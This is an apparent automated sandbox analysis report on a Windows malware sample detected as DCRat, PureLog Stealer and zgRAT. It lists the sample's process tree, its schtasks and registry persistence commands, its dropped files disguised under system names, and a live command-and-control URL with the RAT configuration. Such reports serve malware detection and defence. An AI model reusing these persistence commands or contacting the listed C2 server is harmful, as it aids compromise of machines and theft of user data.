Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fatality.exe

Overview

General Information

Sample name:Fatality.exe
Analysis ID:1498676
MD5:a5a9cde94b59bc5b8b88d60fc28177d3
SHA1:aba15bc72cdeb915369b481926676f0a452d6dcc
SHA256:4ddd25095cce5dadc01782611513331e9fb1e37746adc5501a5b27c2b7aecfa6
Tags:exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Fatality.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\Fatality.exe" MD5: A5A9CDE94B59BC5B8B88D60FC28177D3)
    • wscript.exe (PID: 5268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BridgeInto.exe (PID: 6828 cmdline: "C:\Bridgemonitor/BridgeInto.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
          • schtasks.exe (PID: 5164 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6596 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3420 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 5648 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 4032 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2348 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 416 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6708 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2704 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5052 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3908 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 528 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6332 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3420 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1924 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5388 cmdline: schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4508 cmdline: schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5964 cmdline: schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4032 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6708 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5268 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • dllhost.exe (PID: 4188 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • dllhost.exe (PID: 6268 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • dllhost.exe (PID: 1424 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • BridgeInto.exe (PID: 4972 cmdline: C:\Bridgemonitor\BridgeInto.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • BridgeInto.exe (PID: 6904 cmdline: C:\Bridgemonitor\BridgeInto.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dllhost.exe (PID: 884 cmdline: C:\Recovery\dllhost.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dllhost.exe (PID: 4324 cmdline: C:\Recovery\dllhost.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fatality.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Fatality.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Bridgemonitor\BridgeInto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Bridgemonitor\BridgeInto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Bridgemonitor\BridgeInto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: BridgeInto.exe PID: 6828JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          6.0.BridgeInto.exe.840000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            6.0.BridgeInto.exe.840000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetFilename: C:\Recovery\dllhost.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\dllhost.exe, CommandLine: C:\Recovery\dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dllhost.exe, NewProcessName: C:\Recovery\dllhost.exe, OriginalFileName: C:\Recovery\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Recovery\dllhost.exe, ProcessId: 884, ProcessName: dllhost.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe", EventID: 13, EventType: SetValue, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EoNanmDGxPEtougVgAjHLx
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe", EventID: 13, EventType: SetValue, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", ProcessId: 1908, ProcessName: csc.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Fatality.exe", ParentImage: C:\Users\user\Desktop\Fatality.exe, ParentProcessId: 4540, ParentProcessName: Fatality.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , ProcessId: 5268, ProcessName: wscript.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetFilename: C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", ProcessId: 1908, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, ProcessId: 3908, ProcessName: schtasks.exe

                              Suricata Signatures

                              Timestamp:2024-08-25T15:43:31.655901+0200
                              SID:2048095
                              Severity:1
                              Source Port:49718
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: Fatality.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://373292cm.nyashka.topAvira URL Cloud: Label: malware
                              Source: http://373292cm.nyashka.top/Avira URL Cloud: Label: malware
                              Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\ssh\WinStore.App.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\Desktop\XAjYjGFx.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\vVSvSxGn.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Bridgemonitor\BridgeInto.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\pMLeDcaM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                              Source: C:\Recovery\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\LfISQjWH.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Found malware configuration
                              Source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for domain / URL
                              Source: 373292cm.nyashka.topVirustotal: Detection: 18%Perma Link
                              Multi AV Scanner detection for dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exeReversingLabs: Detection: 100%
                              Source: C:\ProgramData\ssh\WinStore.App.exeReversingLabs: Detection: 100%
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeReversingLabs: Detection: 100%
                              Source: C:\Recovery\dllhost.exeReversingLabs: Detection: 100%
                              Source: C:\Users\user\Desktop\AqqubUji.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\LfISQjWH.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\MMFizuKP.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\nKZvhtVR.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\pMLeDcaM.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\rfcELAFu.logReversingLabs: Detection: 29%
                              Multi AV Scanner detection for submitted file
                              Source: Fatality.exeReversingLabs: Detection: 78%
                              Source: Fatality.exeVirustotal: Detection: 84%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\ssh\WinStore.App.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\EiwsPBui.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\UXzikyum.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Bridgemonitor\BridgeInto.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\pMLeDcaM.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJoe Sandbox ML: detected
                              Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\dllhost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\LfISQjWH.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: Fatality.exeJoe Sandbox ML: detected
                              Source: Fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Bridgemonitor\BridgeInto.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exeJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\c917822ecb0d66Jump to behavior
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Fatality.exe, Fatality.exe, 00000000.00000002.2133149827.0000000000891000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
